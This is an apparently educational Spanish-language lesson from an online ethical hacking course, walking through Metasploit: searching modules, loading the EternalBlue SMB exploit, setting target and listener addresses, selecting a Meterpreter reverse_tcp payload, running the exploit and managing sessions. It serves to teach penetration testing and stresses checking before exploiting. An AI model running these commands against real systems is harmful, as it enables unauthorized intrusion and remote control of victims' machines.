0Pricing
Ethical Hacking Academy · Lección

Búsqueda y uso de exploits

Encontrar y ejecutar

Búsqueda y uso de exploits es una lección gratuita de Ethical Hacking Academy en CoddyKit. Esta es la lección 2 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Ethical Hacking Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Ethical Hacking Academy incluye 4 lecciones en total.

Del reconocimiento al exploit

Después del escaneo, conoce los servicios y las versiones del objetivo. El siguiente paso es encontrar un módulo exploit que coincida con una vulnerabilidad conocida en esas versiones.

El comando search de Metasploit es la puerta de entrada a miles de módulos. Buscar con precisión ahorra tiempo y evita ejecutar código incorrecto.

Búsqueda básica

El comando search consulta el índice de módulos por palabra clave. Puede buscar por nombre del software, CVE o servicio.

search eternalblue
search type:exploit platform:windows smb

Filtros de búsqueda

Refine los resultados con filtros:

  • type: exploit, auxiliary, post.
  • platform: windows, linux, unix.
  • cve: un identificador CVE específico.
  • rank: excellent, great, good (fiabilidad).

Combinar filtros reduce rápidamente miles de módulos a unos pocos.

search cve:2017-0144 type:exploit

Interpretar los resultados de búsqueda

Los resultados de búsqueda muestran cada módulo con un rank, una fecha de divulgación y un indicador de check. El rango refleja la fiabilidad y la seguridad del exploit.

  • excellent: es poco probable que bloquee el objetivo.
  • great/good: fiable en condiciones habituales.
  • low/manual: arriesgado o requiere una configuración cuidadosa.

Prefiera los módulos con rangos altos para evitar bloquear sistemas en producción.

Carga de un módulo

Use el número de índice del módulo o la ruta completa con use. El indicador cambia para mostrar el módulo cargado y el almacén de datos ahora contiene las opciones de ese módulo.

use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >

Inspección del módulo

Antes de ejecutarlo, infórmese sobre el módulo. info muestra la descripción, las referencias (CVE y avisos), las opciones necesarias y los objetivos compatibles.

Comprender lo que hace un módulo forma parte de un uso profesional y responsable; nunca ejecute un exploit que no comprenda.

info
show options
show targets

Configuración de opciones

Configure las opciones necesarias con set. Entre las más habituales para un exploit remoto están la dirección del objetivo y la configuración de su payload.

set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2

El comando check

Muchos exploits admiten check, que comprueba de forma segura si el objetivo parece vulnerable sin explotarlo realmente.

Ejecutar check primero es una buena práctica: reduce el riesgo de bloquear un sistema y confirma que está a punto de dedicar esfuerzos a una oportunidad real.

check
# [+] 10.10.10.40:445 - The target is vulnerable.

Selección del payload

Un exploit necesita un payload. Metasploit selecciona uno predeterminado, pero puede listar y elegir uno adecuado para el objetivo y sus necesidades de acceso.

show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Ejecución y sesiones

Inicie el exploit con exploit (o run). Si tiene éxito, obtendrá una session, una conexión interactiva con el objetivo.

Administre varias sesiones con sessions -l para listarlas y sessions -i N para interactuar con una de ellas. Ejecute background para dejar una sesión en segundo plano y seguir trabajando en la consola.

exploit
sessions -l
sessions -i 1

Opciones globales frente a opciones del módulo

Algunos ajustes, como LHOST, se reutilizan en muchos módulos. Configúrelos globalmente con setg para no tener que volver a escribirlos cada vez que cambie de módulo.

  • set: se aplica solo al módulo actual.
  • setg: se aplica globalmente en todos los módulos.
  • unsetg: elimina un valor global.

Esto ahorra tiempo durante trabajos prolongados con muchos módulos.

setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40

Comprobación rápida

Elija el paso responsable antes de ejecutar un exploit.

Resumen

Ha aprendido a buscar y ejecutar exploits:

  • Use search con filtros (type, platform, cve, rank) para encontrar módulos.
  • Prefiera los módulos de rank más alto por su fiabilidad y seguridad.
  • Use use para cargar, info/show options para inspeccionar y set para configurar.
  • Ejecute primero check y, después, exploit para obtener una session.
  • Administre las sesiones con sessions -l/-i.

A continuación: payloads y el shell de post-explotación Meterpreter.

Preguntas frecuentes

¿La lección «Búsqueda y uso de exploits» es gratis?

Sí — el texto completo de «Búsqueda y uso de exploits» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Ethical Hacking Academy, actualiza a CoddyKit PRO. El curso de Ethical Hacking Academy incluye 4 lecciones en total.

¿Qué aprenderé en «Búsqueda y uso de exploits»?

Encontrar y ejecutar Practicas Ethical Hacking Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.

¿Necesito experiencia previa para empezar Ethical Hacking Academy?

No se requiere experiencia previa. Ethical Hacking Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 2 de 4.

¿Cuánto tiempo toma la lección «Búsqueda y uso de exploits»?

La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.

¿Puedo escribir y ejecutar código en esta lección de Ethical Hacking Academy?

Sí. Cada lección de Ethical Hacking Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.

Todas las lecciones de este curso

  1. Arquitectura de Metasploit
  2. Búsqueda y uso de exploits
  3. Payloads y Meterpreter
  4. Módulos posteriores a la explotación
← Volver a Ethical Hacking Academy